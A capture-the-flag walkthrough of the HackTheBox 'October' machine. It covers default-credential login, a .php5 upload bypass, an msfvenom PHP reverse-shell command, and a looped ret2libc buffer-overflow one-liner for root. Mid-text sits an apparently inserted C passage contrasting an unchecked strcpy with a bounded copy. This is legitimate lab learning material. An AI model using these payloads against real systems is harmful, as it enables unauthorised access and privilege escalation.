
HackTheBox | October Walkthrough

6 min read. Written by Nautilus

October is a machine on HackTheBox which is rated as "medium" difficulty. October has an easy foothold, but a challenging privilege escalation. This machine was a huge learning process for me and I had to reference some write-ups in the process. However, I got there eventually.

Getting a Shell and User.txt

To begin, let's run our initial nmap scan:

nmap -sC -sV
-sC: equivalent to --script=default
-sV: Probe open ports to determine service/version info

After browsing to the web page we are presented with the following:

There's nothing too interesting going on here so let's try using dirb:

dirb /usr/share/wordlists/dirb/small.txt

Looks like we've found some interesting directories. Let's check out /backend first, since that looks to be the most interesting:

Looks like we've found an administrator panel. Let's look up the default credentials to the administrator panel:

I probably should've guessed that... Oh well. Time to try logging in with the default credentials:

It worked! Before going any further, let's use searchsploit to search for any known vulnerabilities in October CMS:

Great! Let's look at the first result, "CMS 1.0.412 - Multiple Vulnerabilities". We might find something that helps us:

The first PoC looks like it's going to work for us. All we have to do is create a shell ending in an "alternative extension" like .php5. Let's quickly use msfvenom to generate our shell to upload:

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=31337 -f raw > oops.php5

Great! Now let's set up a listener in metasploit:

Now we just have to find somewhere to upload the shell:

That was easy enough. Now let's upload our oops.php5 shell:

That worked perfectly. Let's click the public URL and see if it pops our shell:

After a little navigation we find user.txt in /home/harry/ and can read and submit the flag:

Privilege Escalation and Root.txt

Now that we have a shell on the system we're going to want to enumerate and find out our route to privilege escalation. We could use LinEnum.sh, but I decided to simplify the process by exploring SUID binaries:

The binary that stands out immediately is /usr/local/bin/ovrflw. Let's download ovrflw and see what's going on with it:

Plot twist... I couldn't. I was experiencing a lot of problems in my meterpreter shell (not sure if it was my system, meterpreter, or the machine), so I decided to switch over to a regular PHP shell and receive it via netcat:

After much trouble I was able to download ovrflw from the system, rename it to overflow, and then run file on it:

Now let's try to run the file:

So, from what we've gathered so far, we're going to be performing a buffer overflow (hinted at by the name of the file, ovrflw). If we pass any string as input, the "<input string>" message completely disappears:

We're going to need gdb to get a better look at what's going on; otherwise we'll be sitting here forever. Let's open up our file in gdb:

Let's dump some code for the main function:

Let's create a pattern of length 100 now and pass it in as the argument:

Alright... Nothing happened. Let's try doubling that to 200 and running again:

Awesome. Let's search for a pattern now:

We can quickly identify our offset as 112:
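To make concrete what a 112-byte distance to the saved return address implies, here is an added example that is not the ovrflw binary's source (the walkthrough never shows it): a hypothetical program that copies argv[1] into a fixed-size stack buffer with strcpy, beside a bounded version that rejects oversized input. The buffer size of 100 and the function names greet_unchecked, greet_bounded and accepts_length are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for this hypothetical reconstruction; the real */
/* ovrflw layout is not shown in the walkthrough.                      */
#define BUF_SIZE 100

/* Vulnerable "before": strcpy() copies the argument into a fixed stack
 * buffer with no length check, so an oversized argument overwrites the
 * saved frame pointer and return address (the overwrite the cyclic
 * pattern located at offset 112). Never called with untrusted input. */
void greet_unchecked(const char *arg) {
    char buf[BUF_SIZE];
    strcpy(buf, arg);                /* no bound: classic stack overflow */
    printf("%s\n", buf);
}

/* Hardened "after": refuse anything that does not fit, keeping one byte
 * for the terminator. Returns 0 on success, -1 if rejected. */
int greet_bounded(const char *arg, char *out, size_t outlen) {
    size_t n = strlen(arg);
    if (n >= outlen)                 /* >= leaves room for the NUL byte */
        return -1;
    memcpy(out, arg, n + 1);
    return 0;
}

/* Builds an n-byte run of 'A' (the walkthrough's padding byte) and
 * reports whether the bounded copy accepts it (1) or rejects it (0). */
int accepts_length(size_t n) {
    char arg[1024], out[BUF_SIZE];
    if (n >= sizeof arg)
        return 0;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return greet_bounded(arg, out, sizeof out) == 0;
}

int main(int argc, char **argv) {
    char buf[BUF_SIZE];
    if (argc != 2 || greet_bounded(argv[1], buf, sizeof buf) != 0) {
        fprintf(stderr, "usage: %s <string of at most %d bytes>\n",
                argv[0], BUF_SIZE - 1);
        return 1;
    }
    printf("%s\n", buf);
    return 0;
}
```

Compiled with stack protection and PIE (gcc defaults on most distributions), even the unchecked version would abort rather than return into an attacker-chosen address; the walkthrough's binary lacks those mitigations, which is what the later ASLR check is probing.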

I got pretty stuck here... Buffer overflows are not something I'm completely familiar with, so I referenced a few already written walkthroughs, which will be referenced below. Turns out I was on the right path; I just needed to look a little deeper.

First off, I needed to determine whether or not ASLR was enabled:

I can't really explain the next part too well, so I'm going to link some references I used, and the command used to achieve root on the system:

while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112 + "\x10\x53\x5e\xb7\x60\x82\x5d\xb7\xac\x7b\x70\xb7"');done

It's a goal of mine to better understand overflows, and this machine provided an amazing opportunity. Not only did I learn more about overflows, but I nearly exploited one all by myself. I definitely find that my strengths are more in web app testing, but I am enjoying small transitions such as this.

Anyways, let's run the command on the machine and see if we can get root:

After gaining root we can browse to /root/ and read and submit the root.txt flag:

Final Thoughts

I think that retired boxes being available with in-depth write-ups is an amazing opportunity to learn. I'm sure I would've gotten there eventually, but I was able to learn so much about overflows in the process. Once I do more research and practice more, I plan to come back to this box and exploit the overflow entirely by myself.

Thanks for reading, and learning with me.